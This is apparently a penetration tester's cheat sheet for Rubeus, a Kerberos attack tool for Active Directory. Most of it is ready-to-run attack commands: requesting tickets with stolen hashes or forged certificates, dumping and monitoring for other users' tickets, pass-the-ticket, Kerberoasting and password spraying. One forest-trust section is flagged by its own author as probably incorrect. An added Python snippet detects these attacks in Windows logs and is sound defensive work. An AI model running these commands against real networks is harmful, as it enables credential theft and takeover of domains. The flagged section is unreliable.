Rubeus.exe
Rubeus is wonderful for playing with hashes and Kerberos tickets.
Request a TGT
rubeus.exe asktgt /domain:domain.com /user:blah /rc4:NTLMHASH /nowrap
TIP
Note: if doing asktgt for a machine account, be sure to include the trailing dollar sign, e.g. DC01$
Request a TGT with a pfx file (ESC1)
You'd do this, for example, after abusing ESC1 or ESC8 with certify.exe.
Rubeus.exe asktgt /user:ad-user-you-chose-to-impersonate-with-certify.exe-command /certificate:cert.pfx /ptt
Request a TGT with a pfx file (ESC8)
certipy auth -pfx blah.pfx -domain domain.com
rubeus.exe asktgt /domain:domain.com /user:blah /rc4:NTLMHASH /nowrap
rubeus.exe ptt /ticket:THE-PTDC01-TGT-YOU-COPIED-TO-YOUR-CLIPBOARD-EARLIER
Request a TGT when abusing forest trusts [ UNDER REVIEW ]
DANGER
I was working on this in a lab and don't think this section below is right, so ignore it until further review.
If you're in a situation where you've got DA on DOMAIN2.COM and want to abuse that to pwn DOMAIN1.COM, and you've extracted the domain SIDs with Get-ADObject and the trust keys with mimikatz, you can do something like this to request a TGT for the target domain:
rubeus.exe asktgt /user:domain2$ /domain:domain1.com /rc4:THE-rc4_hmac_nt-YOU-EXTRACTED-WITH-MIMIKATZ /nowrap
Dump tickets on a local machine
rubeus.exe dump /service:krbtgt /nowrap
Monitor mode on a local machine
This is handy when you're WinRM'd into a box with local/domain admin creds and you want to steal other TGTs:
rubeus monitor /interval:5 /nowrap /runfor:60 /registry:SOFTWARE\MONITOR
Monitor mode - save to disk
If for some reason the TGTs won't write to registry, try this to write to disk:
rubeus monitor /interval:5 /nowrap /runfor:60 /consoleoutfile:c:\users\public\some-innocent-looking-file.log
Extracting TGTs from registry hives after monitor mode attack
Once you've done the monitor "attack" and captured TGTs to the registry, use reg.exe to extract them:
reg export HKLM\SOFTWARE\MONITOR backup1.reg
TIP
Once you have the TGTs, use something like rubeus2ccache to convert them to kirbi or ccache. Then you can use rubeus to pass the TGT.
Describe a ticket
rubeus.exe describe /ticket:base64ticket
This came in really handy during an engagement where I had lifted a TGT from a system and was trying to pass and use it, and was getting all sorts of errors. When I ran the describe command, the output said KeyType=180, which I learned means Credential Guard is in place and that the ticket won't work anywhere but the box it came from!
Pass-the-ticket
rubeus.exe ptt /ticket:xxx
Kerberoasting attack
rubeus.exe kerberoast /simple /outfile:kerberoast.txt
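As an added defender-side example (not part of the original cheat sheet), this Python snippet shows what the asktgt /rc4 and kerberoast commands above look like in Windows Security log data: 4769 TGS requests with RC4 (etype 0x17) ticket encryption for several distinct service accounts from one source, and a 4768 TGT request whose ticket etype is RC4. The event records are constructed sample data; field names follow the 4768/4769 event schema but are shortened for readability.

```python
from collections import defaultdict

# Constructed sample records in the shape of Windows Security events 4768
# (TGT request) and 4769 (TGS request). Values are made up for this example.
SAMPLE_EVENTS = [
    {"id": 4769, "user": "jsmith@DOMAIN.COM", "src": "10.0.0.5", "service": "sql01$", "etype": "0x12"},
    {"id": 4769, "user": "jsmith@DOMAIN.COM", "src": "10.0.0.5", "service": "svc_sql", "etype": "0x17"},
    {"id": 4769, "user": "jsmith@DOMAIN.COM", "src": "10.0.0.5", "service": "svc_web", "etype": "0x17"},
    {"id": 4769, "user": "jsmith@DOMAIN.COM", "src": "10.0.0.5", "service": "svc_backup", "etype": "0x17"},
    {"id": 4769, "user": "jsmith@DOMAIN.COM", "src": "10.0.0.5", "service": "krbtgt", "etype": "0x17"},
    {"id": 4768, "user": "blah", "src": "10.0.0.5", "service": "krbtgt", "etype": "0x17"},
    {"id": 4768, "user": "alice", "src": "10.0.0.9", "service": "krbtgt", "etype": "0x12"},
]

RC4_HMAC = "0x17"  # etype 23; a domain that issues AES tickets should rarely see this


def kerberoast_suspects(events, threshold=3):
    """Return {(user, src): [services]} for sources that requested RC4-encrypted
    service tickets for `threshold` or more distinct non-machine SPN accounts.
    Machine accounts (trailing $) and krbtgt are skipped: they are not what a
    roaster asks for, and they would inflate the count."""
    hits = defaultdict(set)
    for ev in events:
        if ev["id"] != 4769 or ev["etype"] != RC4_HMAC:
            continue
        svc = ev["service"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        hits[(ev["user"], ev["src"])].add(svc)
    return {k: sorted(v) for k, v in hits.items() if len(v) >= threshold}


def rc4_tgt_requests(events):
    """4768 events whose ticket etype is RC4: the footprint of asktgt /rc4
    (overpass-the-hash) in a domain that otherwise issues AES tickets."""
    return [(ev["user"], ev["src"]) for ev in events
            if ev["id"] == 4768 and ev["etype"] == RC4_HMAC]


if __name__ == "__main__":
    print(kerberoast_suspects(SAMPLE_EVENTS))  # one source, three RC4 service tickets
    print(rc4_tgt_requests(SAMPLE_EVENTS))     # one RC4 TGT request
```

On real data, feed it the 4768/4769 records from your DCs' Security logs and tune the threshold; accounts that legitimately still use RC4 will show up and should be fixed rather than whitelisted.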
Password spraying
rubeus.exe spray /password:MySprayedPass2024! /domain:domain.com /dc:1.2.3.4 /outfile:successful-sprays.txt
Password spraying (with passwords file)
It's the same command as above, except instead of /password:SomePassword you use:
/passwords:file-full-of-passwords.txt